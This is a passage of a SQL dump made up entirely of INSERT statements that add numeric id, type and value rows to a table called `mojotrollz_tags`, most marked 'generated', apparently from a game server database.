(16068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16070, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16072, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16076, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16079, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16079, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16080, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16082, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16082, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16083, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16091, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16091, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16094, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16095, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16096, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16097, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16098, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16100, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16100, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16101, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16102, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16105, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16106, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16107, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16108, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16109, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16112, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16112, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16113, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16114, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16115, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16115, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16116, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16116, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16117, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16118, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16120, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16124, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16125, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16126, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16127, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16131, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16131, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16132, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16132, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16133, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16133, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16134, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16134, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16135, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16135, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16137, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16137, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16139, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16143, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16145, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16145, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16145, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16146, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16146, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16146, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16148, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16149, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16150, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16154, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16154, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16154, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16156, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16156, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16156, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16157, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16157, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16157, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16158, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16158, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16158, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16163, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16163, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16163, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16164, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16164, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16164, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16165, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16165, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16165, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16167, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16167, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16167, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16168, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16168, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16168, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16184, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16193, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16193, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16193, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16194, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16194, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16194, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16211, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16211, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16211, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16212, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16215, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16215, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16215, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16216, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16216, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16216, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16218, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16218, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16225, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16225, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16226, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16227, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16227, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16227, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16227, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16227, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16228, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16229, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16230, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16236, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16236, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16236, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16243, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16243, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16243, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16244, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16244, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16244, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16254, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16281, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16283, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16284, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16290, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16297, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16297, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16297, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16360, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16365, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16365, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16365, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16368, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16368, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16368, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16375, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16378, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16378, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16379, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16380, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16381, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16381, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16381, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16382, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16383, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16387, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16392, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16394, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16396, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 